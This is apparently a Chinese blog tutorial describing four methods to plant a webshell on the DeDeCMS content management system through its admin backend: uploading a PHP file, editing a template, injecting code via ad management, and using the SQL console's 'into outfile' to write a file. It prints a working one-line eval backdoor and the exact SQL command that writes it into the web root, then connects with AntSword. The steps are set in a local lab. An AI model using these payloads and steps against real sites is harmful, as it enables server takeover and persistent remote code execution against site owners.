CMS漏洞-DeDeCMS篇

一.姿势一:通过⽂件管理器上传WebShell

1.首先我们搭建网站然后进行登录

2.模块👉文件管理器👉文件上传

3.新建一个1.php文件,内容为:

<?php phpinfo();?>

选择1.php文件上传

4.访问网站根目录下的1.php,发现代码成功执行,说明我们的木马上传成功!!

二.姿势二:修改模板文件拿WebShell

1.模板👉默认模板管理👉index.htm👉修改

2.插入代码:

<?php phpinfo();?>并保存

3.生成👉更新主机html,主页位置修改为index.php,生成静态,更新主页html

4.访问主页,发现主页为phpinfo界面,说明我们植入的代码有效!

三.姿势三:后台任意命令执⾏拿WebShell

1.模块👉广告管理

在内容上写入代码:

<?php phpinfo();?>

2.上传成功后查看代码,并复制引号内容

3.访问后发现页面无回显

4.现在我们将代码换为一句话木马:

<?php @eval($_POST[cmd]);?>

5.跟上述步骤一样复制引号内容并访问

6.使用蚁剑连接,连接成功!!

说明木马成功植入

四.姿势四:通过后台sql命令执⾏拿webshell

1.系统👉sql命令行工具

在命令行输入select @@basedir;

获取mysql路径,由此猜测⽹站绝对路径

2.在命令行输入:

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/dedecms/uploads/webshell.php'

上传一句话木马到webshell.php文件

3.我们在网站根目录下发现了webshell.php文件,内容为一句话木马

4.我们访问木马文件并复制其绝对路径

5.连接成功!

木马植入成功!

相关推荐
lingggggaaaa3 分钟前
小迪安全v2023学习笔记(六十一讲)—— 持续更新中
笔记·学习·安全·web安全·网络安全·反序列化
紫金桥软件3 小时前
紫金桥RealSCADA:国产工业大脑,智造安全基石
安全·系统安全·软件工程
柑木3 小时前
隐私计算-SecretFlow/SCQL-SCQL的两种部署模式
后端·安全·数据分析
峥嵘life3 小时前
Android 欧盟网络安全EN18031 要求对应的基本表格填写
android·安全·web安全
光爷不秃4 小时前
Go语言中安全停止Goroutine的三种方法及设计哲学
开发语言·安全·golang
挨踢攻城7 小时前
IT资讯 | VMware ESXi高危漏洞影响国内服务器
安全·web安全·网络安全·vmware·虚拟化技术·厦门微思网络·vmware esxi高危漏洞
厦门辰迈智慧科技有限公司7 小时前
白蚁监测仪是什么,其工作原理和应用领域
物联网·安全·自动化·监测
OpenAnolis小助手8 小时前
朗空量子与 Anolis OS 完成适配,龙蜥获得抗量子安全能力
安全·开源·操作系统·龙蜥社区·龙蜥生态
百里晴鸢10 小时前
小白也能懂的iptables核心逻辑!四张表+五条链如何守护你的网络安全?
linux·安全
wanhengidc11 小时前
云手机选哪个比较好用?
服务器·网络·安全·游戏·智能手机